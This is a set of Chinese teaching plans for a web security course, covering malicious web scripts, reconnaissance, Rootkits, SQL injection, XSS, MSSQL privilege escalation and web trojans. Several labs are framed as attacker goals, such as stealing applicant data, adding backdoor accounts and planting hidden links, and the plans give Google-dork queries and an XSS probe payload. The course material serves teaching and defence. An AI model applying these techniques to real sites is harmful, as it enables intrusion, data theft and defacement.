授课主要内容或板书设计1情境设置目标：编写网页恶意脚本，通过诱使受骗用户来访问该网页，进而在目标系统中执行该网页脚本并写入恶意文件。方法：在虚拟机中，编写网页脚本病毒，并观察执行脚本前后系统变化情况。网页病毒。网页病毒是利用网页进行攻击的一类恶意代码。根据网页病毒能够以各种方式自动执行的特性，而且其根源是它完全不受用户的控制。当用户一旦浏览了含有恶意代码的网页，恶意代码就会自动执行，给用户端计算机带来不同程度的破坏或影响。尝试通过以下的形式诱使用户来访问：构造容易记忆的网页名称利用浏览者的猎奇或贪婪心理无意识的浏览者2实验过程主要操作步骤如下：Step1：以administrator身份登录实用中的计算机操作系统。用“记事本”等文本编辑工具打开“创建.txt”文件，将显示如图1所示的执行脚本的内容。图1Step2：打开C盘，查看C盘下是否有“test.htm”文件。修改“创建.txt”文件的类型为.HTM，然后单击运行。当出现的提示信息时，单击“确定”按钮，允许阻止的内容的运行。随后，出现如图2所示的空白显示页面。图2Step3：重新查看C盘，就会发现存在一个名为“test.htm”的文件，如图3所示。图3说明通过在浏览器中运行“创建.htm”文件后，在C盘下自动创建了一个名为“test.htm”的文件。Step4：打开D:\tools文件夹中的“修改.txt”文件，此文件主要对前面已经创建的“test.htm”文件的内容进行修改，“修改.txt”文件的内容如图4所示。图4Step5：修改“修改.txt”文件的类型为.HTM，然后单击该文件使之运行，当出现类似安全提示信息时，选择“允许阻止的内容”，并在出现的对话框中直接单击“是”，允许该文件在浏览器中打开。Step6：当“修改.htm”运行结束后，再运行C盘中的“test.htm”文件，将出现如图5所示的页面，说明修改文件内容成功。图5（详细步骤参见实验报告内容）教案（课时授课计划）教师姓名授课班级授课形式理论授课日期年11月25日第13周授课时数3授课章节名称Web应用的结构、针对Web服务器的信息收集教学目的与要求1.了解僵尸网络结构、组成及各模块具体功能2.了解Rootkit工具集实施攻击的几种方式教学重点或教学难点Rootkit攻击具体实施过程更新、补充、删节内容无使用教具或手段多媒体课外作业简述僵尸网络的工作机制，并分析其防御方法。通过对Rootkit攻击技术的介绍，简述其检测和防御方法。课后体会授课主要内容或板书设计1Web服务器的信息收集1.1收集的信息内容针对Web服务器的攻击，可收集的信息主要包括以下几类：地址信息。包括：服务器的IP地址，DNS域名，打开的端口号以及对应的服务进程等。系统信息。包括：操作系统类型及版本，Web服务器软件类型及版本，Web应用程序及版本，Web应用程序的开发工具及版本，Web应用程序架构（是静态HTML页面，还是PHP、APS、JSP动态页面等），数据库管理系统的类型及版本等账户信息。包括：操作系统的登录账户，数据库管理系统的账户，应用系统的管理账户等。配置信息。包括：网络拓扑结构，地址映射表（当Web服务器位于内部局域网中使用私有IP地址时），服务配置信息，共享资源，防火墙类型及配置信息，身份认证与访问控制方式，加密及密码管理机制等。其他信息。包括：安全漏洞（软件漏洞和管理漏洞），DNS注册信息，网络管理员联系方式等。1.2网络扫描先通过“主机扫描”发现目标网络中存在的活跃主机，然后通过“端口扫描”找出活跃主机上所开放的端口及对应的网络服务，接着通过“系统类型探测”确定攻击主机的操作系统类型及版本号，最后通过“漏洞扫描”找到攻击主机上存在的安全漏洞。1、主机扫描基于ICMP协议的扫描方法甚至TCP协议的主机扫描方法基于UDP协议的主机扫描方法2、端口扫描连接扫描SYN扫描UDP端口扫描3、系统类型探测操作系统类型探测网络服务类型探测1.3漏洞扫描1、漏洞扫描的原理2、漏洞扫描器安全漏洞数据库扫描引擎模块用户配置控制台扫描进程控制模块结果存储与报告生成模块1.4针对Web服务器信息收集的防范方法2Rootkit2.1概念Rootkit是攻击者使用的一个软件工具集，用于获得对系统的非授权访问，为攻击者获取敏感数据提供特殊权限，并隐藏自己的存在，而且根据需要允许安装其他恶意软件，是能够获得系统特权并能够控制整个系统的工具集。例：以Windows为例具体进行讨论：要存在能够挂钩的地方都可以实现基于挂钩的Rootkit攻击。从理论上讲，不管是用户模式还是内核模式，只要存在能够挂钩的地方都可以实现基于挂钩的Rootkit攻击。1、挂钩Windows环境下主要有两种实现API函数挂钩的操作：一种是通过修改PE（PortableExecutable，可移植执行体）文件的IAT（ImportAddressTable，输入地址表）使API函数地址重定向，该方式称为IATHoo教案（课时授课计划）教师姓名授课班级授课形式实验授课日期年11月27日第13周授课时数3授课章节名称信息搜集、漏洞扫描以及网络嗅探教学目的与要求1.掌握信息收集的各类工具使用2.掌握漏洞扫描的各类工具使用3.综合以上工具，获取渗透攻击前期的信息收集工作教学重点或教学难点重点：各个工具的结合使用，收集有价值可利用的信息。更新、补充、删节内容无使用教具或手段多媒体课外作业对常见的Dedecms、Discuz！进行漏洞信息收集在互联网上收集自己的各类信息课后体会授课主要内容或板书设计1情境设置目标：某黑客想攻破某招生网站，获取考生信息，现针对该招生web站点，收集其相关信息：域名、ip地址、子域名、网站指纹、系统端口、系统漏洞、内网拓扑。方法：通过信息收集相关工具，依次对以上信息进行收集。2信息收集实验2.1利用搜索引擎收集信息除了Googlehacking技术外，其他现阶段的bing、百度、搜狗、360都有相应的高级搜索功能。其实利用的就是搜索引擎对构造特殊关键，进行快速全面的挖掘出有价值的信息。例：利用搜索引擎提供的语法，后面加上filetype:pdf那么这个语法就是搜索以googlehacking为标题的pdf文件。这时候搜索引擎返回的结果中含有大量的pdf文件。常用GoogleHacking语法：intext：（仅对Google有效）把网页的正文内容中的某个字符作为搜索的条件intitle：把网页标题中的某个字符作为搜索的条件cache：搜索搜索引擎里关于某些内容的缓存，可能会在过期内容中发现有价值的信息filetype：指定一个格式类型的文件作为搜索对象inurl：搜索包含指定字符的URLsite：在指定的站点搜索相关内容典型用法：找管理后台地址site:intext:管理|后台|登陆|用户名|密码|系统|账号site:inurl:login/admin/manager/admin_login/systemsite:intitle:管理|后台|登陆找上传类漏洞：site:inurl:filesite:inurl:upload找注入页面：site:inurl:php?id=site:inurl:asp?id=找编辑器页面：site:inurl:webeditor2.2通过目标站点收集信息主要目标有：目标站点使用的技术（页面、数据库等）目标站点的whois信息，是否可能存在旁站等挖掘目标站点可能使用的网络安全配置挖掘目标企业机构可能存在的管理架构使用站长工具对目标站点进行初步扫描其他与目标站点相关的信息使用站长工具对目标站点进行信息收集：IP查询同IP网站查询WHOIS查询和反查子域名查询识别服务器类型、页面类型DNS信息查询网站安全检测端口扫描2.3漏洞信息收集信息漏洞平台是很好的信息收集平台，能够通过公开的漏洞报告了解目标的各项信息，常用的漏洞平台如下。CVE漏洞库360补天漏洞平台Exploit-DBGHDB中国国家信息安全漏洞库国家信息安全漏洞共享平台2.4工具收集信息常用的DOS命令：ping：网络连通测试arp：显示和修改地址解析协议tracert：显示路由nslookup：域名系统查询telnet：测试是否开启远程连接netstat：查看本地机器所有开放端口ftp：测试开放了ftp的远程主机net：最重要的命令，需要透彻掌握每一个子命令常用的扫描工具：AWVSAppScanZenmapLayer御剑DirbusterwwwsacnMaltegoShodan/Zoomeyewhatweb使用浏览器内置功能和插件：常用的浏览器有GoogleChrome/Firefox/IE/遨游，以FireFox为例，有如下插件：showIP插件HttpFox插件CookieWatcher插件HeaderSpy插件Wappalyzer插件FlagFox插件DomainDetails插件Kali下的工具数百种，安全工具做了很好的分类。信息收集分类下还有子分类，工具比较多，这边做以下几点介绍。点击DNSenum，自动弹出当前的参数说明。dnsenum--enum，结果将主机地址、dns信息、邮件地址等进行罗列。点击fierce；fierce–dns输入。识别活跃的主机、查看打开的端口、系统指纹识别、服务的指纹识别：Nmaphping3（也可以用作压力测试）2.5网络社交信息收集社交网站特点：清晰暴露个人关系网络包含大量个人信息具备多种工作、生活服务功能身份认证机制并非完美记录大量个人行为特征3漏洞扫描实验本小节通过对w3af工具使用方法的学习，能够掌握服务器安全漏洞的扫描和审计方法。Step1：运行攻击机。运行cd/pentest/web/w3af命令，切换到w3af工作目录，然后使用ls命令查看当前目录下的文件。Step2：使用命令traget命令进入target目录，设置目标地址target为08，为下一步进行扫描进行准备，如图5-44所示。Step3：使用back命令返回到主目录w3af>>>，然后使用命令start开始扫描.使用exit命令退出，然后使用ls命令查看是否有前面创建的testreport.html文件。Step4：利用浏览器（本实验为Firefox）打开testreport.html文件，显示所示的信息。（详细步骤参见实验报告内容）教案（课时授课计划）教师姓名授课班级授课形式讲授授课日期年12月2日第14周授课时数3授课章节名称第五章Web服务器的攻防教学目的与要求了解Web浏览器存在的问题，与之相对应进行的攻防教学重点或教学难点难点：SQL注入与XSS漏洞的攻击思想更新、补充、删节内容使用教具或手段课外作业课后体会授课主要内容或板书设计第5章Web服务器的攻防5.4Web应用程序的攻防Web应用程序安全威胁根据Web应用所受到的威胁、攻击的共同特征分类：SQL注入漏洞SQL注入攻击示意图SQL注入威胁表现形式可以体现为以下几点：绕过认证，获得非法权限猜解后台数据库全部的信息注入可以借助数据库的存储过程进行提权等操作SQL注入攻击的典型手段判断应用程序是否存在注入漏洞收集信息、并判断数据库类型根据注入参数类型，重构SQL语句的原貌猜解表名、字段名获取账户信息、攻击web或为下一步攻击做准备SQL注入攻击的原理SQL注入攻击过程（1）寻找注入点最常见的SQL注入点的判断方法是在动态网页中寻找如下形式的链接： http://Website/**.asp?xx=abc http://Website/**.php?xx=abc http://Website/**.jsp?xx=abc http://Website/**.aspx?xx=abc（2）探测后台数据库的类型利用Web应用程序的开发语言来猜测后台数据库的类型；借助数据库的一些特征来探测后台数据库的类型。（3）获得管理员账户信息跨站脚本（XSS）漏洞（1）反射式XSS攻击反射式XSS攻击也称为非持久性XSS攻击或参数型XSS攻击，是一种最常见的XSS攻击类型，主要用于将恶意脚本附加到URL地址的参数中，如：http://WebSite/home.php?id=<script>alert(/xss/)</script>。反射式XSS攻击实现过程：攻击者发现存在XSS安全漏洞网页（URL）后，根据输出点的环境构造XSS攻击代码并进行编码；然后通过特定手段(如发送电子邮件)发送给受害者，诱使受害者去访问一个包含恶意代码的URL；当受害者点击这个经过专门设计的URL链接后，攻击代码会直接在受害者的浏览器上解析并执行。（2）存储式XSS攻击存储式XSS攻击的攻击代码持久性地保存在Web服务器中，不需要用户点击特定的URL就能够执行跨站脚本，并在用户端执行恶意代码；利用存储式XSS漏洞可以编写危害性更大的XSS蠕虫，XSS蠕虫会直接影响到网站的所有用户，当一个地方出现XSS漏洞时，相同站点下的所有用户都可能被攻击。（3）基于DOM的XSS攻击5.5Web服务器软件的攻防Apache攻防Apache安全漏洞分析：与其他服务器软件一样，Apache同样也因出现一些高危安全漏洞导致系统服务出现安全问题，但通过对近年来发生的大量安全漏洞的统计分析，Apache的高危漏洞主要集中在Apache模块（ApacheModules），而非Apache核心程序。这是因为Apache核心程序的设计是非常安全的，但大量的官方和非官方模块的出现，在丰富了Apache应用功能的同时，却带来了大量的安全隐患。尤其在安装了Apache后，默认安装和启动的模块中存在不少的安全漏洞。Apache的防范：针对Apache管理员账户的防范Apache服务器配置文件Apache服务器的密码保护IIS攻防与其他的网络服务守护进程一样，IIS同样也面临着缓冲区溢出、不安全代码和指针、格式化字符串等一系列攻击，这类攻击是基于数据驱动安全漏洞的远程渗透攻击，往往能够让攻击者在Web服务器上直接获得远程代码的执行权，并执行一些操作。IIS的安全配置：（1）禁用默认网站（2）防止资源解析攻击（3）正确选择验证方式IIS提供的4种身份验证方式比较：（4）通过IP地址限制连接

教案（课时授课计划）教师姓名授课班级1授课形式上机授课日期年12月4日第14周授课时数3授课章节名称实验XSS跨站脚本攻击以及MSSQL提权教学目的与要求熟悉系统提权攻击基本方法的基础上，以MSSQL数据库系统为操作对象，掌握针对MSSQL提权的实现方法。了解XSS漏洞的攻击原理及相关知识，能够进行简单的XSS攻击教学重点或教学难点MSSQL提权XSS跨站脚本攻击更新、补充、删节内容使用教具或手段课外作业课后体会防范XSS攻击的方法针对MSSQL提权攻击的防范方法授课主要内容或板书设计XSS跨站脚本攻击以及MSSQL提权1、MSSQL提权操作情景设置目标：入侵一个系统，在其中设置一个后门账户。方法：采用字典破解方式获得MSSQL的账户，当前为普通用户，因此利用MSSQL提权至管理员账户，最后添加后门账户。实验确认被攻击系统的IP地址和SQLServer是否已经正常启动运行X-Scan扫描器，扫描被攻击系统SQL-Server弱口令扫描参数设置设置字典使用第三方工具SQLTools工具连接到MSSQL数据库执行DOS命令界面，查看当前用户权限查询分析器连接MSSQL数据库在查询分析器中执行提权代码查看当前用户权限使用DOS命令添加后门账户2、XSS跨站脚本攻击通过XAMPP的控制台启动XAMPP的Apache和MySQL服务配置DVWA平台XSS反射式攻击反射式XSS攻击页面PHP源码分析反射式XSS攻击（页面效果与URL信息）XSS存储式攻击存储式XSS攻击页面PHP源码分析反射式XSS攻击（在Message输入框中输入<script>alert(/XSS/)</script>）

教案（课时授课计划）教师姓名授课班级1授课形式讲授授课日期年12月9日第15周授课时数3授课章节名称第六章Web浏览器的攻防教学目的与要求了解Web浏览器存在的问题，与之相对应进行的攻防教学重点或教学难点重点：了解web浏览器存在的问题，以及浏览器插件和脚本的攻防更新、补充、删节内容使用教具或手段课外作业课后体会授课主要内容或板书设计第六章Web浏览器的攻防6.1Web浏览器技术万维网WWW应用特点Web浏览器历史国外发展历史国内发展历史Web浏览器的安全安全性分析：B/S结构安全分析Web浏览器自身安全分析扩展程序、插件等附加产品安全分析Web浏览器权限控制安全分析Web浏览器安全风险涉及内容Web浏览器的隐私保护Web浏览器隐私泄露分析浏览器会收集用户的上网行为，通过大数据分析，了解用户的个人信息收集原因：用户上网信息中蕴藏着大量的商业利益，所以一些公司和商业机构出于自身利益会大量收集用户的上网信息。Web浏览器还会记录用户的上网行为基于DNT的隐私泄露防范方法DNT（DoNotTrack，请勿跟踪）是浏览器提供的一项禁止对用户上网行为进行跟踪的功能。利用“隐私浏览模式”防范隐私泄露：Web开放数据挖掘形成的安全威胁隐私数据保护分析：开放数据保护与利用是镜子的两面，就像隐私保护和让渡隐私增强个性化体验一样，需要网站所属企业、安全厂商，以及监管第三方共同努力。而从技术角度讲，网站的防护思路也需要转变，比如及时检测和避免公开数据被恶意抓取，采取技术手段强化数据安全存储与传输等。这些都将成为研究者和安全厂商未来的研究方向。6.2Web浏览器插件和脚本的攻防Web浏览器插件的攻防Web浏览器常用插件：常见的Web浏览器插件有Flash插件、RealPlayer插件、MMS插件、MIDI五线谱插件、ActiveX插件等。插件分类：根据插件在Web浏览器中的加载位置，可以分为工具条（Toolbar）、浏览器辅助（BHO）、搜索挂接（URLSearchhook）和下载ActiveX等方式。常见插件介绍插件带来的风险分析脚本的攻防脚本病毒介绍：脚本病毒的防范方法：脚本病毒的检测与防范思路与对传统病毒的检测与防范方法基本相同。传统的病毒检测方法包括特征代码法、校验和法、行为监测法、软件模拟法等：特征代码法提取病毒的某一小段特征代码进行识别，所以对未知病毒几乎无法预测，另外新增病毒的数量在不断加大的情况下，病毒特征代码的数量也在加大，会影响检测速度；校验和法是对文件作校验和，并将其保存，一旦校验和改变，就视为异常，这种检测方法依赖文件长度和内容，预警过于敏感容易产生误报；行为监测法从理论上讲可以监测到未知病毒，但是实现复杂，速度较低。6.3针对Web浏览器Cookie的攻防Cookie介绍Cookie产生背景Cookie的发展历史Cookie的功能及应用Cookie的组成及工作原理Cookie的工作机制2）由Web客户端生成的Cookie格式由客户端生成的CookieHeader由“NAME=VALUE”对组成，其格式为： NAME1=VALUE1[;NAME2=VALUE2]……[;NAMEi=VALUEi]其中，NAMEi表示第i个Cookie的名称，VALUEi表示其值。这里的NAME和对应的VALUE与Set-Cookie中的相同。3）由Web服务器生成的Cookie格式Cookie的安全防范教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年12月11日第15周授课时数3授课章节名称实验BurpSuite漏洞扫描和WeGoat使用教学目的与要求学习漏洞扫描技术的基本原理，了解漏洞扫描技术在网络攻防中的作用，学会使用BurpSuite对目标网站进行扫描的具体方法，并根据报告做出相应的防护措施。掌握基于应用层的弱点测试手段与方法，学会使用WebGoat工具演示Web浏览器中的典型安全漏洞的应用程序教学重点或教学难点BurpSuite漏洞扫描WebGoat工具使用更新、补充、删节内容使用教具或手段课外作业课后体会授课主要内容或板书设计BurpSuite漏洞扫描和WeGoat使用BurpSuite漏洞扫描情景设置目标：远程入侵网站服务器植入暗链牟利方法：采用BurpSuite工具扫描存在漏洞的网站，然后攻入对方服务器，在网页中植入暗链实验在靶机上搭建一个简单的网站BurpSuite工具捕获Web浏览器的操作使用spider主要通过网络爬虫来爬取网页信息扫描网站存在的漏洞利用漏洞攻击进入对方网站后台管理界面修改后台数据，在对方网站中植入暗链WeGoat使用字符串型SQL注入实验选取StringSQLInjection输入SQL注入命令通过注入SQL查询命令，获得所有的用户列表教案（课时授课计划）教师姓名授课班级1授课形式讲授授课日期年12月16日第16周授课时数3授课章节名称第六章Web浏览器的攻防教学目的与要求了解Web浏览器存在的问题，与之相对应进行的攻防教学重点或教学难点重点：了解网络钓鱼和黑链攻击的概念更新、补充、删节内容使用教具或手段课外作业课后体会授课主要内容或板书设计第六章Web浏览器的攻防6.4网页木马的攻防网页木马的攻击原理网页木马概念从技术本质来看，网页木马主要利用了Web浏览器软件中所支持的客户端脚本执行能力，通过对Web浏览器软件安全漏洞的利用而对客户端实施参透攻击，在获取了对客户端主机的远程代码执行权限后再植入木马程序，进而发起有针对性的攻击；从发展历程来看，网页木马是针对网络服务的一种攻击行为，只是早期的攻击主要针对的是服务器软件，而网页木马则主要针对的是Web浏览器软件。客户端感染的两个阶段漏洞利用阶段。网页木马被客户端加载后，攻击代码利用内存破坏类漏洞将执行流跳转到ShellCode或者直接利用任意下载API，在客户端下载、执行盗号木马或僵尸程序等恶意程序。恶意程序执行阶段。下载的盗号木马或僵尸程序等恶意程序，窃取客户端的帐号等隐私信息或使客户端成为“肉鸡”加入僵尸网络。网页木马攻击载体具体攻击步骤：攻击者选取存在安全漏洞的Web站点植入网页木马程序（一般还会同时植入其他的木马程序，如盗号木马），将其作为攻击过程中的木马宿主站点；通过在大量网站中嵌入恶意链接将用户访问重定向到网页木马，从而构成一个网页木马攻击网络；当不明真相的用户在访问了含有木马程序的网站后，就会自动地链接网页木马并遭受攻击，成为网页木马的受害者。网页挂马的实现方法内嵌链接内嵌HTML标签内嵌对象链接内嵌对象链接是利用Flash等工具内嵌对象中的特定功能来实现指定页面加载的一种方法。恶意Script脚